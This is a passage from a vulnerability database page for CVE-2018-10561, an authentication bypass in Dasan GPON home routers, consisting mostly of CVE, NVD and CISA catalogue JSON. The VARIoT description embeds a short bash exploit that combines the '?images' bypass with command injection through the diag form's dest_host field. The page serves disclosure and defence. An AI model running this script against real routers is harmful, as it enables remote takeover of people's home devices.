CVE-2018-10561 (GCVE-0-2018-10561)

Vulnerability from cvelistv5 – Published: 2018-05-04 03:00 – Updated: 2025-10-21 23:45

CISA

Summary

Severity ?

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

Assigner

mitre

References

URL

CISA Known Exploited Vulnerability

Data from the CISA Known Exploited Vulnerabilities Catalog

Date added: 2022-03-31

Due date: 2022-04-21

Required action: The impacted product is end-of-life and should be disconnected if still in use.

Used in ransomware: Unknown

Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-10561

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T07:39:08.323Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "107053",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/107053"
          },
          {
            "name": "44576",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/44576/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 9.8,
              "baseSeverity": "CRITICAL",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2018-10561",
                "options": [
                  {
                    "Exploitation": "active"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-03T15:41:24.667227Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          },
          {
            "other": {
              "content": {
                "dateAdded": "2022-03-31",
                "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-10561"
              },
              "type": "kev"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-287",
                "description": "CWE-287 Improper Authentication",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-21T23:45:51.827Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "government-resource"
            ],
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-10561"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2022-03-31T00:00:00+00:00",
            "value": "CVE-2018-10561 added to CISA KEV"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2018-05-03T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-02-19T10:57:01.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "107053",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/107053"
        },
        {
          "name": "44576",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/44576/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-10561",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "107053",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/107053"
            },
            {
              "name": "44576",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/44576/"
            },
            {
              "name": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/",
              "refsource": "MISC",
              "url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-10561",
    "datePublished": "2018-05-04T03:00:00.000Z",
    "dateReserved": "2018-04-30T00:00:00.000Z",
    "dateUpdated": "2025-10-21T23:45:51.827Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "cisa_known_exploited": {
      "cveID": "CVE-2018-10561",
      "cwes": "[\"CWE-287\"]",
      "dateAdded": "2022-03-31",
      "dueDate": "2022-04-21",
      "knownRansomwareCampaignUse": "Unknown",
      "notes": "https://nvd.nist.gov/vuln/detail/CVE-2018-10561",
      "product": "Gigabit Passive Optical Network (GPON) Routers",
      "requiredAction": "The impacted product is end-of-life and should be disconnected if still in use.",
      "shortDescription": "Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.",
      "vendorProject": "Dasan",
      "vulnerabilityName": "Dasan GPON Routers Authentication Bypass Vulnerability"
    },
    "fkie_nvd": {
      "cisaActionDue": "2022-04-21",
      "cisaExploitAdd": "2022-03-31",
      "cisaRequiredAction": "The impacted product is end-of-life and should be disconnected if still in use.",
      "cisaVulnerabilityName": "Dasan GPON Routers Authentication Bypass Vulnerability",
      "configurations": "[{\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"8153A5BC-B257-4774-8106-E77FA2239A99\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:dasannetworks:gpon_router:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"E795B673-4FC0-4A2B-821E-63F87B90D6C6\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \\\"?images\\\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.\"}, {\"lang\": \"es\", \"value\": \"Se ha descubierto un problema en los routers dom\\u00e9sticos Dasan GPON. Es posible omitir la autenticaci\\u00f3n anexionando \\\"?images\\\" a cualquier URL del dispositivo que requiera autenticaci\\u00f3n, tal y como queda demostrado con los URI /menu.html?images/ o /GponForm/diag_FORM?images/. As\\u00ed, se puede gestionar el dispositivo.\"}]",
      "id": "CVE-2018-10561",
      "lastModified": "2024-11-21T03:41:33.423",
      "metrics": "{\"cvssMetricV30\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.0\", \"vectorString\": \"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:N/C:P/I:P/A:P\", \"baseScore\": 7.5, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"PARTIAL\", \"integrityImpact\": \"PARTIAL\", \"availabilityImpact\": \"PARTIAL\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 10.0, \"impactScore\": 6.4, \"acInsufInfo\": true, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2018-05-04T03:29:00.227",
      "references": "[{\"url\": \"http://www.securityfocus.com/bid/107053\", \"source\": \"cve@mitre.org\", \"tags\": [\"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://www.exploit-db.com/exploits/44576/\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Technical Description\", \"Third Party Advisory\"]}, {\"url\": \"http://www.securityfocus.com/bid/107053\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://www.exploit-db.com/exploits/44576/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Technical Description\", \"Third Party Advisory\"]}]",
      "sourceIdentifier": "cve@mitre.org",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-287\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2018-10561\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2018-05-04T03:29:00.227\",\"lastModified\":\"2025-11-05T19:23:25.363\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \\\"?images\\\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.\"},{\"lang\":\"es\",\"value\":\"Se ha descubierto un problema en los routers dom\u00e9sticos Dasan GPON. Es posible omitir la autenticaci\u00f3n anexionando \\\"?images\\\" a cualquier URL del dispositivo que requiera autenticaci\u00f3n, tal y como queda demostrado con los URI /menu.html?images/ o /GponForm/diag_FORM?images/. As\u00ed, se puede gestionar el dispositivo.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9},{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":7.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":true,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"cisaExploitAdd\":\"2022-03-31\",\"cisaActionDue\":\"2022-04-21\",\"cisaRequiredAction\":\"The impacted product is end-of-life and should be disconnected if still in use.\",\"cisaVulnerabilityName\":\"Dasan GPON Routers Authentication Bypass Vulnerability\",\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-287\"}]},{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-287\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8153A5BC-B257-4774-8106-E77FA2239A99\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:dasannetworks:gpon_router:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E795B673-4FC0-4A2B-821E-63F87B90D6C6\"}]}]}],\"references\":[{\"url\":\"http://www.securityfocus.com/bid/107053\",\"source\":\"cve@mitre.org\",\"tags\":[\"Broken Link\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.exploit-db.com/exploits/44576/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Technical Description\",\"Third Party Advisory\"]},{\"url\":\"http://www.securityfocus.com/bid/107053\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.exploit-db.com/exploits/44576/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Technical Description\",\"Third Party Advisory\"]},{\"url\":\"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-10561\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"US Government Resource\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"http://www.securityfocus.com/bid/107053\", \"name\": \"107053\", \"tags\": [\"vdb-entry\", \"x_refsource_BID\", \"x_transferred\"]}, {\"url\": \"https://www.exploit-db.com/exploits/44576/\", \"name\": \"44576\", \"tags\": [\"exploit\", \"x_refsource_EXPLOIT-DB\", \"x_transferred\"]}, {\"url\": \"https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-05T07:39:08.323Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}, {\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2018-10561\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"active\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-02-03T15:41:24.667227Z\"}}}, {\"other\": {\"type\": \"kev\", \"content\": {\"dateAdded\": \"2022-03-31\", \"reference\": \"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-10561\"}}}], \"timeline\": [{\"lang\": \"en\", \"time\": \"2022-03-31T00:00:00+00:00\", \"value\": \"CVE-2018-10561 added to CISA KEV\"}], \"references\": [{\"url\": \"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-10561\", \"tags\": [\"government-resource\"]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-287\", \"description\": \"CWE-287 Improper Authentication\"}]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-02-03T15:40:55.815Z\"}}], \"cna\": {\"affected\": [{\"vendor\": \"n/a\", \"product\": \"n/a\", \"versions\": [{\"status\": \"affected\", \"version\": \"n/a\"}]}], \"datePublic\": \"2018-05-03T00:00:00.000Z\", \"references\": [{\"url\": \"http://www.securityfocus.com/bid/107053\", \"name\": \"107053\", \"tags\": [\"vdb-entry\", \"x_refsource_BID\"]}, {\"url\": \"https://www.exploit-db.com/exploits/44576/\", \"name\": \"44576\", \"tags\": [\"exploit\", \"x_refsource_EXPLOIT-DB\"]}, {\"url\": \"https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \\\"?images\\\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"text\", \"description\": \"n/a\"}]}], \"providerMetadata\": {\"orgId\": \"8254265b-2729-46b6-b9e3-3dfca2d5bfca\", \"shortName\": \"mitre\", \"dateUpdated\": \"2019-02-19T10:57:01.000Z\"}, \"x_legacyV4Record\": {\"affects\": {\"vendor\": {\"vendor_data\": [{\"product\": {\"product_data\": [{\"version\": {\"version_data\": [{\"version_value\": \"n/a\"}]}, \"product_name\": \"n/a\"}]}, \"vendor_name\": \"n/a\"}]}}, \"data_type\": \"CVE\", \"references\": {\"reference_data\": [{\"url\": \"http://www.securityfocus.com/bid/107053\", \"name\": \"107053\", \"refsource\": \"BID\"}, {\"url\": \"https://www.exploit-db.com/exploits/44576/\", \"name\": \"44576\", \"refsource\": \"EXPLOIT-DB\"}, {\"url\": \"https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/\", \"name\": \"https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/\", \"refsource\": \"MISC\"}]}, \"data_format\": \"MITRE\", \"description\": {\"description_data\": [{\"lang\": \"eng\", \"value\": \"An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \\\"?images\\\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.\"}]}, \"problemtype\": {\"problemtype_data\": [{\"description\": [{\"lang\": \"eng\", \"value\": \"n/a\"}]}]}, \"data_version\": \"4.0\", \"CVE_data_meta\": {\"ID\": \"CVE-2018-10561\", \"STATE\": \"PUBLIC\", \"ASSIGNER\": \"cve@mitre.org\"}}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2018-10561\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-21T23:45:51.827Z\", \"dateReserved\": \"2018-04-30T00:00:00.000Z\", \"assignerOrgId\": \"8254265b-2729-46b6-b9e3-3dfca2d5bfca\", \"datePublished\": \"2018-05-04T03:00:00.000Z\", \"assignerShortName\": \"mitre\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

VAR-201805-0262

Vulnerability from variot - Updated: 2023-12-18 12:56

An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. Dasan GPON home router Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit the vulnerability by bypassing the vulnerability by adding \342\200\230?images\342\200\231 to any of the device's URLs. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash

echo "[+] Sending the Commanda| "

We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices

curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`$2`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waitinga|." sleep 3 echo "[+] Retrieving the ouputa|." curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\n/\n/ga

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201805-0262",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "gpon router",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "dasannetworks",
        "version": null
      },
      {
        "model": "gpon routers",
        "scope": null,
        "trust": 0.8,
        "vendor": "dasan",
        "version": null
      },
      {
        "model": "networks gpon",
        "scope": null,
        "trust": 0.6,
        "vendor": "dasan",
        "version": null
      },
      {
        "model": "networks gpon router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "dasan",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-09230"
      },
      {
        "db": "BID",
        "id": "107053"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004885"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10561"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-189"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dasannetworks:gpon_router:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-10561"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "None",
    "sources": [
      {
        "db": "BID",
        "id": "107053"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-189"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2018-10561",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": true,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2018-10561",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
